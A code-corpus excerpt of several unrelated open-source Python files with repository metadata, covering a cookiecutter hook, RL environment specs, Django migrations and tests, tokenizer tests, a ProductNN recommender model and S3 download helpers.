"Unstructured Cube-Sphere Face Data (N, 4)",
position="upper_left",
font_size=10,
shadow=True,
)
plotter.show()
| 24.828571 | 79 | 0.735328 | ["BSD-3-Clause"] | trexfeathers/geovista | examples/example_from_unstructured__lfric.py | 869 | Python |
"""Post gen hook to ensure that the generated project
has only one package-management setup, either pipenv or pip."""
import logging
import os
import shutil
import sys
_logger = logging.getLogger()
def clean_extra_package_management_files():
"""Removes either requirements files and folder or the Pipfile."""
use_pipenv = "{{cookiecutter.use_pipenv}}"
use_heroku = "{{cookiecutter.use_heroku}}"
to_delete = []
if use_pipenv == "yes":
to_delete = to_delete + ["requirements.txt", "requirements"]
else:
to_delete.append("Pipfile")
if use_heroku == "no":
to_delete = to_delete + ["Procfile", "app.json"]
try:
for file_or_dir in to_delete:
if os.path.isfile(file_or_dir):
os.remove(file_or_dir)
else:
shutil.rmtree(file_or_dir)
shutil.copy(".env.example", ".env")
open("dev.db", 'a').close()
except OSError as e:
_logger.warning("While attempting to remove file(s) an error occurred")
_logger.warning(f"Error: {e}")
sys.exit(1)
if __name__ == "__main__":
clean_extra_package_management_files()
| 28.292683 | 79 | 0.637931 | ["MIT"] | HaeckelK/cookiecutter-flask | hooks/post_gen_project.py | 1,160 | Python |
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for environment interface with agent / tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange
class spaces(object):
discrete = 0
box = 1
def get_space(space):
if hasattr(space, 'n'):
return space.n, spaces.discrete, None
elif hasattr(space, 'shape'):
return np.prod(space.shape), spaces.box, (space.low, space.high)
def get_spaces(spaces):
if hasattr(spaces, 'spaces'):
return zip(*[get_space(space) for space in spaces.spaces])
else:
return [(ret,) for ret in get_space(spaces)]
class EnvSpec(object):
def __init__(self, env, try_combining_actions=True,
discretize_actions=None):
self.discretize_actions = discretize_actions
# figure out observation space
self.obs_space = env.observation_space
self.obs_dims, self.obs_types, self.obs_info = get_spaces(self.obs_space)
# figure out action space
self.act_space = env.action_space
self.act_dims, self.act_types, self.act_info = get_spaces(self.act_space)
if self.discretize_actions:
self._act_dims = self.act_dims[:]
self._act_types = self.act_types[:]
self.act_dims = []
self.act_types = []
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
self.act_dims.append(dim)
self.act_types.append(spaces.discrete)
elif typ == spaces.box:
for _ in xrange(dim):
self.act_dims.append(self.discretize_actions)
self.act_types.append(spaces.discrete)
else:
self._act_dims = None
self._act_types = None
if (try_combining_actions and
all(typ == spaces.discrete for typ in self.act_types)):
self.combine_actions = True
self.orig_act_dims = self.act_dims[:]
self.orig_act_types = self.act_types[:]
total_act_dim = 1
for dim in self.act_dims:
total_act_dim *= dim
self.act_dims = [total_act_dim]
self.act_types = [spaces.discrete]
else:
self.combine_actions = False
self.obs_dims_and_types = list(zip(self.obs_dims, self.obs_types))
self.act_dims_and_types = list(zip(self.act_dims, self.act_types))
self.total_obs_dim = sum(self.obs_dims)
self.total_sampling_act_dim = sum(self.sampling_dim(dim, typ)
for dim, typ in self.act_dims_and_types)
self.total_sampled_act_dim = sum(self.act_dims)
def sampling_dim(self, dim, typ):
if typ == spaces.discrete:
return dim
elif typ == spaces.box:
return 2 * dim # Gaussian mean and std
else:
assert False
def convert_actions_to_env(self, actions):
if self.combine_actions:
new_actions = []
actions = actions[0]
for dim in self.orig_act_dims:
new_actions.append(np.mod(actions, dim))
actions = (actions / dim).astype('int32')
actions = new_actions
if self.discretize_actions:
new_actions = []
idx = 0
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
new_actions.append(actions[idx])
idx += 1
elif typ == spaces.box:
low, high = self.act_info[i]
cur_action = []
for j in xrange(dim):
cur_action.append(
low[j] + (high[j] - low[j]) * actions[idx] /
float(self.discretize_actions))
idx += 1
new_actions.append(np.hstack(cur_action))
actions = new_actions
return actions
def convert_env_actions_to_actions(self, actions):
if not self.combine_actions:
return actions
new_actions = 0
base = 1
for act, dim in zip(actions, self.orig_act_dims):
new_actions = new_actions + base * act
base *= dim
return [new_actions]
def convert_obs_to_list(self, obs):
if len(self.obs_dims) == 1:
return [obs]
else:
return list(obs)
  def convert_action_to_gym(self, action):
    if len(action) == 1:
      return action[0]
    else:
      return list(action)
def initial_obs(self, batch_size):
batched = batch_size is not None
batch_size = batch_size or 1
obs = []
for dim, typ in self.obs_dims_and_types:
if typ == spaces.discrete:
obs.append(np.zeros(batch_size))
elif typ == spaces.box:
obs.append(np.zeros([batch_size, dim]))
if batched:
return obs
else:
      return list(zip(*obs))[0]  # zip is lazy in Python 3
def initial_act(self, batch_size=None):
batched = batch_size is not None
batch_size = batch_size or 1
act = []
for dim, typ in self.act_dims_and_types:
if typ == spaces.discrete:
act.append(-np.ones(batch_size))
elif typ == spaces.box:
act.append(-np.ones([batch_size, dim]))
if batched:
return act
else:
      return list(zip(*act))[0]  # zip is lazy in Python 3
def is_discrete(self, typ):
return typ == spaces.discrete
def is_box(self, typ):
return typ == spaces.box
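# A minimal usage sketch (not part of the original module), assuming a Gym-style
# environment `env` exposing `observation_space` and `action_space`:
#
#   spec = EnvSpec(env, try_combining_actions=True)
#   obs = spec.initial_obs(batch_size=4)
#   act = spec.initial_act(batch_size=4)
#   env_actions = spec.convert_actions_to_env(act)
#
# convert_actions_to_env maps the internal (possibly combined or discretized)
# action layout back to the layout the wrapped environment expects.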
| 30.045 | 80 | 0.6442 | [
"Apache-2.0"
] | azhou42/tensorflow-models-private | research/pcl_rl/env_spec.py | 6,009 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-06-10 08:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data_exchange', '0004_auto_20180610_0833'),
]
operations = [
migrations.AlterField(
model_name='ontaskworkflow',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
migrations.AlterField(
model_name='qualtricssurvey',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
]
| 25.730769 | 74 | 0.61136 | [
"MIT"
] | Ikochoy/mooclet-engine | mooclet_engine/data_exchange/migrations/0005_auto_20180610_0835.py | 669 | Python |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings.dev")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.4375 | 73 | 0.684112 | [
"Apache-2.0"
] | vtalks/vtalks.net | web/manage.py | 535 | Python |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
from transformers.file_utils import cached_property
from transformers.testing_utils import slow
from transformers.tokenization_fsmt import VOCAB_FILES_NAMES, FSMTTokenizer
from .test_tokenization_common import TokenizerTesterMixin
# using a different tiny model than the one used for default params defined in init to ensure proper testing
FSMT_TINY2 = "stas/tiny-wmt19-en-ru"
class FSMTTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = FSMTTokenizer
def setUp(self):
super().setUp()
# Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt
vocab = [
"l",
"o",
"w",
"e",
"r",
"s",
"t",
"i",
"d",
"n",
"w</w>",
"r</w>",
"t</w>",
"lo",
"low",
"er</w>",
"low</w>",
"lowest</w>",
"newer</w>",
"wider</w>",
"<unk>",
]
vocab_tokens = dict(zip(vocab, range(len(vocab))))
merges = ["l o 123", "lo w 1456", "e r</w> 1789", ""]
self.langs = ["en", "ru"]
config = {
"langs": self.langs,
"src_vocab_size": 10,
"tgt_vocab_size": 20,
}
self.src_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["src_vocab_file"])
self.tgt_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["tgt_vocab_file"])
config_file = os.path.join(self.tmpdirname, "tokenizer_config.json")
self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["merges_file"])
with open(self.src_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.tgt_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.merges_file, "w") as fp:
fp.write("\n".join(merges))
with open(config_file, "w") as fp:
fp.write(json.dumps(config))
@cached_property
def tokenizer_ru_en(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en")
@cached_property
def tokenizer_en_ru(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-en-ru")
def test_online_tokenizer_config(self):
"""this just tests that the online tokenizer files get correctly fetched and
loaded via its tokenizer_config.json and it's not slow so it's run by normal CI
"""
tokenizer = FSMTTokenizer.from_pretrained(FSMT_TINY2)
self.assertListEqual([tokenizer.src_lang, tokenizer.tgt_lang], ["en", "ru"])
self.assertEqual(tokenizer.src_vocab_size, 21)
self.assertEqual(tokenizer.tgt_vocab_size, 21)
def test_full_tokenizer(self):
""" Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt """
tokenizer = FSMTTokenizer(self.langs, self.src_vocab_file, self.tgt_vocab_file, self.merges_file)
text = "lower"
bpe_tokens = ["low", "er</w>"]
tokens = tokenizer.tokenize(text)
self.assertListEqual(tokens, bpe_tokens)
input_tokens = tokens + ["<unk>"]
input_bpe_tokens = [14, 15, 20]
self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), input_bpe_tokens)
@slow
def test_sequence_builders(self):
tokenizer = self.tokenizer_ru_en
text = tokenizer.encode("sequence builders", add_special_tokens=False)
text_2 = tokenizer.encode("multi-sequence build", add_special_tokens=False)
encoded_sentence = tokenizer.build_inputs_with_special_tokens(text)
encoded_pair = tokenizer.build_inputs_with_special_tokens(text, text_2)
assert encoded_sentence == text + [2]
assert encoded_pair == text + [2] + text_2 + [2]
@slow
def test_match_encode_decode(self):
tokenizer_enc = self.tokenizer_en_ru
tokenizer_dec = self.tokenizer_ru_en
targets = [
[
"Here's a little song I wrote. Don't worry, be happy.",
[2470, 39, 11, 2349, 7222, 70, 5979, 7, 8450, 1050, 13160, 5, 26, 6445, 7, 2],
],
["This is it. No more. I'm done!", [132, 21, 37, 7, 1434, 86, 7, 70, 6476, 1305, 427, 2]],
]
# if data needs to be recreated or added, run:
# import torch
# model = torch.hub.load("pytorch/fairseq", "transformer.wmt19.en-ru", checkpoint_file="model4.pt", tokenizer="moses", bpe="fastbpe")
# for src_text, _ in targets: print(f"""[\n"{src_text}",\n {model.encode(src_text).tolist()}\n],""")
for src_text, tgt_input_ids in targets:
encoded_ids = tokenizer_enc.encode(src_text, return_tensors=None)
self.assertListEqual(encoded_ids, tgt_input_ids)
# and decode backward, using the reversed languages model
decoded_text = tokenizer_dec.decode(encoded_ids, skip_special_tokens=True)
self.assertEqual(decoded_text, src_text)
@slow
def test_tokenizer_lower(self):
tokenizer = FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en", do_lower_case=True)
tokens = tokenizer.tokenize("USA is United States of America")
expected = ["us", "a</w>", "is</w>", "un", "i", "ted</w>", "st", "ates</w>", "of</w>", "am", "er", "ica</w>"]
self.assertListEqual(tokens, expected)
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_torch_encode_plus_sent_to_model(self):
pass
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_np_encode_plus_sent_to_model(self):
pass
| 38.071429 | 141 | 0.635241 | [
"Apache-2.0"
] | DATEXIS/adapter-transformers | tests/test_tokenization_fsmt.py | 6,396 | Python |
from django.db import models
from django.test import SimpleTestCase
from .models import Book, ChildModel1, ChildModel2
class IndexesTests(SimpleTestCase):
def test_suffix(self):
self.assertEqual(models.Index.suffix, 'idx')
def test_repr(self):
index = models.Index(fields=['title'])
multi_col_index = models.Index(fields=['title', 'author'])
self.assertEqual(repr(index), "<Index: fields='title'>")
self.assertEqual(repr(multi_col_index), "<Index: fields='title, author'>")
def test_eq(self):
index = models.Index(fields=['title'])
same_index = models.Index(fields=['title'])
another_index = models.Index(fields=['title', 'author'])
index.model = Book
same_index.model = Book
another_index.model = Book
self.assertEqual(index, same_index)
self.assertNotEqual(index, another_index)
def test_index_fields_type(self):
with self.assertRaisesMessage(ValueError, 'Index.fields must be a list.'):
models.Index(fields='title')
def test_raises_error_without_field(self):
msg = 'At least one field is required to define an index.'
with self.assertRaisesMessage(ValueError, msg):
models.Index()
def test_max_name_length(self):
msg = 'Index names cannot be longer than 30 characters.'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='looooooooooooong_index_name_idx')
def test_name_constraints(self):
msg = 'Index names cannot start with an underscore (_).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='_name_starting_with_underscore')
msg = 'Index names cannot start with a number (0-9).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='5name_starting_with_number')
def test_name_auto_generation(self):
index = models.Index(fields=['author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_0f5565_idx')
# '-' for DESC columns should be accounted for in the index name.
index = models.Index(fields=['-author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_708765_idx')
# fields may be truncated in the name. db_column is used for naming.
long_field_index = models.Index(fields=['pages'])
long_field_index.set_name_with_model(Book)
self.assertEqual(long_field_index.name, 'model_index_page_co_69235a_idx')
# suffix can't be longer than 3 characters.
long_field_index.suffix = 'suff'
msg = 'Index too long for multiple database support. Is self.suffix longer than 3 characters?'
with self.assertRaisesMessage(AssertionError, msg):
long_field_index.set_name_with_model(Book)
def test_deconstruction(self):
index = models.Index(fields=['title'])
index.set_name_with_model(Book)
path, args, kwargs = index.deconstruct()
self.assertEqual(path, 'django.db.models.Index')
self.assertEqual(args, ())
self.assertEqual(kwargs, {'fields': ['title'], 'name': 'model_index_title_196f42_idx'})
def test_clone(self):
index = models.Index(fields=['title'])
new_index = index.clone()
self.assertIsNot(index, new_index)
self.assertEqual(index.fields, new_index.fields)
def test_abstract_children(self):
index_names = [index.name for index in ChildModel1._meta.indexes]
self.assertEqual(index_names, ['model_index_name_440998_idx'])
index_names = [index.name for index in ChildModel2._meta.indexes]
self.assertEqual(index_names, ['model_index_name_b6c374_idx'])
| 42.362637 | 102 | 0.679377 | [
"Apache-2.0"
] | HSunboy/hue | desktop/core/ext-py/Django-1.11/tests/model_indexes/tests.py | 3,855 | Python |
import urllib.request as ul
import json
import pandas as pd
def get_chart(ticker, period1, period2):
    """Fetch chart history for `ticker` between `period1` and `period2`
    from the local chart API, returning the history list or None on failure."""
    url = f"http://localhost:9000/chart/{ticker}?period1={period1}&period2={period2}"
    request = ul.Request(url)
    response = ul.urlopen(request)
    rescode = response.getcode()
    if rescode != 200:
        return None
    responsedata = response.read()
    # normalize single quotes so the payload parses as JSON
    my_json = responsedata.decode('utf8').replace("'", '"')
    data = json.loads(my_json)
    return data["data"]["history"]
info = get_chart("aaa", 20211015, 20211104)
df = pd.json_normalize(info)
df.to_csv("aaa_chart.csv")
print(df)
| 21.714286 | 85 | 0.674342 | [
"MIT"
] | SHSongs/EFT | client/main.py | 608 | Python |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
from time import time
import tensorflow as tf
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import roc_auc_score
class ProductNN(BaseEstimator, TransformerMixin):
def __init__(self, feature_size, field_size, embedding_size=8,
deep_layers=None, deep_init_size=50, dropout_deep=None,
deep_layer_activation=tf.nn.relu, epoch=10, batch_size=256,
learning_rate=0.001, optimizer="adam", batch_norm=0,
batch_norm_decay=0.995, verbose=False, random_seed=2016,
loss_type="logloss", eval_metric=roc_auc_score,
greater_is_better=True, use_inner=True):
assert loss_type in ["logloss", "mse"],\
"loss_type can be either 'logloss' for classification task or 'mse' for regression task"
if deep_layers is None:
deep_layers = [32, 32]
if dropout_deep is None:
dropout_deep = [0.5, 0.5, 0.5]
self.feature_size = feature_size
self.field_size = field_size
self.embedding_size = embedding_size
self.deep_layers = deep_layers
self.deep_init_size = deep_init_size
self.dropout_dep = dropout_deep
self.deep_layers_activation = deep_layer_activation
self.epoch = epoch
self.batch_size = batch_size
self.learning_rate = learning_rate
self.optimizer_type = optimizer
self.batch_norm = batch_norm
self.batch_norm_decay = batch_norm_decay
self.verbose = verbose
self.random_seed = random_seed
self.loss_type = loss_type
self.greater_is_better = greater_is_better
self.train_result, self.valid_result = [], []
self.use_inner = use_inner
self._init_graph()
def _init_graph(self):
self.graph = tf.Graph()
with self.graph.as_default():
tf.set_random_seed(self.random_seed)
# input data,模型输入
self.feat_index = tf.placeholder(tf.int32, shape=[None, None],
name='feat_index')
self.feat_value = tf.placeholder(tf.float32, shape=[None, None],
name='feat_value')
self.label = tf.placeholder(tf.float32, shape=[None, 1], name='label')
self.dropout_keep_deep = tf.placeholder(tf.float32, shape=[None],
name='dropout_deep_deep')
self.train_phase = tf.placeholder(tf.bool, name='train_phase')
# weight initializing,权重初始化
self.weights = self._initialize_weights()
# model
self.embeddings = tf.nn.embedding_lookup(self.weights['feature_embeddings'], self.feat_index)
feat_value = tf.reshape(self.feat_value, shape=[-1, self.field_size, 1])
self.embeddings = tf.multiply(self.embeddings, feat_value)
# linear signal
linear_output = []
for i in range(self.deep_init_size):
linear_output.append(tf.reshape(tf.reduce_sum(
tf.multiply(self.embeddings, self.weights['product-linear'][i]),
axis=[1, 2]), shape=(-1, 1)))
self.lz = tf.concat(linear_output, axis=1)
# quadratic signal
quadratic_output = []
if self.use_inner:
for i in range(self.deep_init_size):
theta = tf.multiply(
self.embeddings, tf.reshape(self.weights['product-quadratic-inner'][i], (1, -1, 1)))
quadratic_output.append(tf.reshape(
tf.norm(tf.reduce_sum(theta, axis=1), axis=1), shape=(-1, 1)))
else:
embedding_sum = tf.reduce_sum(self.embeddings, axis=1)
p = tf.matmul(tf.expand_dims(embedding_sum, 2), tf.expand_dims(embedding_sum, 1))
for i in range(self.deep_init_size):
theta = tf.multiply(p, tf.expand_dims(
self.weights['product-quadratic-outer'][i], 0))
quadratic_output.append(tf.reshape(
tf.reduce_sum(theta, axis=[1, 2]), shape=(-1, 1)))
self.lp = tf.concat(quadratic_output, axis=1)
self.y_deep = tf.nn.relu(tf.add(tf.add(self.lz, self.lp), self.weights['product-bias']))
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[0])
# deep part
for i in range(0, len(self.deep_layers)):
self.y_deep = tf.add(tf.matmul(self.y_deep, self.weights["layer_%d" % i]), self.weights["bias_%d" % i])
self.y_deep = self.deep_layers_activation(self.y_deep)
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[i+1])
self.out = tf.add(tf.matmul(self.y_deep, self.weights['output']), self.weights['output_bias'])
# loss,代价函数
if self.loss_type == "logloss":
self.out = tf.nn.sigmoid(self.out)
self.loss = tf.losses.log_loss(self.label, self.out)
elif self.loss_type == "mse":
self.loss = tf.nn.l2_loss(tf.subtract(self.label, self.out))
# optimizer,优化器选择
if self.optimizer_type == "adam":
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate, beta1=0.9, beta2=0.999,
epsilon=1e-8).minimize(self.loss)
elif self.optimizer_type == "adagrad":
self.optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate,
initial_accumulator_value=1e-8).minimize(self.loss)
elif self.optimizer_type == "gd":
self.optimizer = tf.train.GradientDescentOptimizer(learning_rate=self.learning_rate).minimize(self.loss)
elif self.optimizer_type == "momentum":
self.optimizer = tf.train.MomentumOptimizer(learning_rate=self.learning_rate,
momentum=0.95).minimize(self.loss)
# init
self.saver = tf.train.Saver()
init = tf.global_variables_initializer()
self.sess = tf.Session()
self.sess.run(init)
# number of params
total_parameters = 0
for variable in self.weights.values():
shape = variable.get_shape()
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.value
total_parameters += variable_parameters
if self.verbose > 0:
print("#params: %d" % total_parameters)
def _initialize_weights(self):
weights = dict()
# Sparse Features->Dense Embeddings weight initializing
# one-hot编码后输入到Embedding的权重矩阵初始化
weights['feature_embeddings'] = tf.Variable(tf.random_normal(
[self.feature_size, self.embedding_size], 0.0, 0.01), name='feature_embeddings')
weights['feature_bias'] = tf.Variable(tf.random_normal(
[self.feature_size, 1], 0.0, 1.0), name='feature_bias')
# Product Layers
if self.use_inner:
weights['product-quadratic-inner'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size], 0.0, 0.01))
else:
weights['product-quadratic-outer'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.embedding_size, self.embedding_size], 0.0, 0.01))
weights['product-linear'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size, self.embedding_size], 0.0, 0.01))
        weights['product-bias'] = tf.Variable(tf.random_normal([self.deep_init_size], 0.0, 1.0))
# Deep layers weight initializing,Xavier初始化
num_layer = len(self.deep_layers)
input_size = self.deep_init_size
glorot = np.sqrt(2.0/(input_size + self.deep_layers[0])) # var(w)=2/(nin+nout)
weights['layer_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(input_size, self.deep_layers[0])), dtype=np.float32)
weights['bias_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[0])), dtype=np.float32)
for i in range(1, num_layer):
glorot = np.sqrt(2.0 / (self.deep_layers[i - 1] + self.deep_layers[i]))
weights["layer_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[i - 1], self.deep_layers[i])),
dtype=np.float32) # layers[i-1] * layers[i]
weights["bias_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[i])),
dtype=np.float32) # 1 * layer[i]
# final concat projection layer
glorot = np.sqrt(2.0/(input_size + 1))
weights['output'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[-1], 1)), dtype=np.float32)
weights['output_bias'] = tf.Variable(tf.constant(0.01), dtype=np.float32)
return weights
# noinspection PyMethodMayBeStatic
def get_batch(self, xi, xv, y, batch_size, index):
start = index * batch_size
end = (index + 1) * batch_size
end = end if end < len(y) else len(y)
return xi[start:end], xv[start:end], [[y_] for y_ in y[start:end]]
# noinspection PyMethodMayBeStatic
def shuffle_in_unison_scary(self, a, b, c):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
np.random.set_state(rng_state)
np.random.shuffle(c)
def predict(self, xi, xv):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
out = self.sess.run(self.out, feed_dict=feed_dict)
return out
def evaluate(self, xi, xv, y):
y = [[y_] for y_ in y]
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
loss = self.sess.run([self.loss], feed_dict=feed_dict)
return loss
def fit_on_batch(self, xi, xv, y):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: self.dropout_dep,
self.train_phase: True}
loss, opt = self.sess.run([self.loss, self.optimizer], feed_dict=feed_dict)
return loss
def fit(self, xi_train, xv_train, y_train, xi_valid=None, xv_valid=None,
y_valid=None, early_stopping=False, refit=False):
"""
:param xi_train: [[ind1_1, ind1_2, ...], ..., [indi_1, indi_2, ..., indi_j, ...], ...]
indi_j is the feature index of feature field j of sample i in the training set
:param xv_train: [[val1_1, val1_2, ...], ..., [vali_1, vali_2, ..., vali_j, ...], ...]
vali_j is the feature value of feature field j of sample i in the training set
                         vali_j can be either binary (1/0, for binary/categorical features) or float (e.g. 10.24, for numerical features)
:param y_train: label of each sample in the training set
:param xi_valid: list of list of feature indices of each sample in the validation set
:param xv_valid: list of list of feature values of each sample in the validation set
:param y_valid: label of each sample in the validation set
:param early_stopping: perform early stopping or not
:param refit: refit the model on the train+valid dataset or not
:return: None
"""
has_valid = xv_valid is not None
for epoch in range(self.epoch):
t1 = time()
# shuffle the dataset,打乱dataset顺序
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
# get batch data and fit them,获得batch数据并fit
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
# evaluate training and validation dataset,评价train/valid dataset
train_result = self.evaluate(xi_train, xv_train, y_train)
self.train_result.append(train_result[0])
if has_valid:
valid_result = self.evaluate(xi_valid, xv_valid, y_valid)
self.valid_result.append(valid_result[0])
if self.verbose > 0 and epoch % self.verbose == 0:
if has_valid:
print("[%d] train-loss=%.4f, valid-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], valid_result[0], time() - t1))
else:
print("[%d] train-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], time() - t1))
if has_valid and early_stopping and self.training_termination(self.valid_result):
break
# fit a few more epoch on train+valid until result reaches the best_train_score
if has_valid and refit:
if self.greater_is_better:
best_valid_score = max(self.valid_result)
else:
best_valid_score = min(self.valid_result)
best_epoch = self.valid_result.index(best_valid_score)
best_train_score = self.train_result[best_epoch]
xi_train = xi_train + xi_valid
xv_train = xv_train + xv_valid
y_train = y_train + y_valid
for epoch in range(100):
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
# check the model performance
train_result = self.evaluate(xi_train, xv_train, y_train)
ckp1 = abs(train_result - best_train_score) < 0.001
ckp2 = self.greater_is_better and train_result > best_train_score
ckp3 = (not self.greater_is_better) and train_result < best_train_score
if ckp1 or ckp2 or ckp3:
break
def training_termination(self, valid_result):
if len(valid_result) > 5:
if self.greater_is_better:
if valid_result[-1] < valid_result[-2] < valid_result[-3] < valid_result[-4] < valid_result[-5]:
return True
else:
if valid_result[-1] > valid_result[-2] > valid_result[-3] > valid_result[-4] > valid_result[-5]:
return True
return False
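# A minimal usage sketch (not part of the original module); the sizes below are
# illustrative, and xi_*/xv_*/y_* follow the format documented in `fit`:
#
#   model = ProductNN(feature_size=100, field_size=4, embedding_size=8,
#                     deep_layers=[32, 32], epoch=5, batch_size=64,
#                     verbose=1, use_inner=True)
#   model.fit(xi_train, xv_train, y_train, xi_valid, xv_valid, y_valid)
#   predictions = model.predict(xi_valid, xv_valid)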
| 47.574924 | 120 | 0.577296 | [
"MIT"
] | Daniel1586/Initiative_RecSys | tutorials/chapter_05_ProductNN/ProductNN.py | 15,649 | Python |
# -*- coding: utf-8 -*-
"""
Created on Tue May 12 00:00:00 2020
@author: Shaji
"""
import boto3
import os
boto3.setup_default_session()
s3_client = boto3.client('s3')
def list_buckets(client=s3_client):
"""
Usage: [arg1]:[initialized s3 client object],
Description: Gets the list of buckets
Returns: [list of buckets]
"""
response = s3_client.list_buckets()
buckets=[]
for bucket in response['Buckets']:
buckets.append(bucket["Name"])
return buckets
def list_objects(bucket,prefix='',client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[initialized s3 client object],
Description: Gets the keys in the S3 location
Returns: [list of keys], [list of directories]
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
return keys,list(dirs)
def download_dir(bucket, prefix, local_path, client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[local path to folder in which to place files],[arg4]:[initialized s3 client object],
Description: Downloads the contents to the local path
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
local=local_path+bucket+'\\'
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
for d in dirs:
dest_pathname = os.path.join(local, d)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
for k in keys:
dest_pathname = os.path.join(local, k)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
client.download_file(bucket, k, dest_pathname)
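# A minimal usage sketch (not part of the original module); the bucket name,
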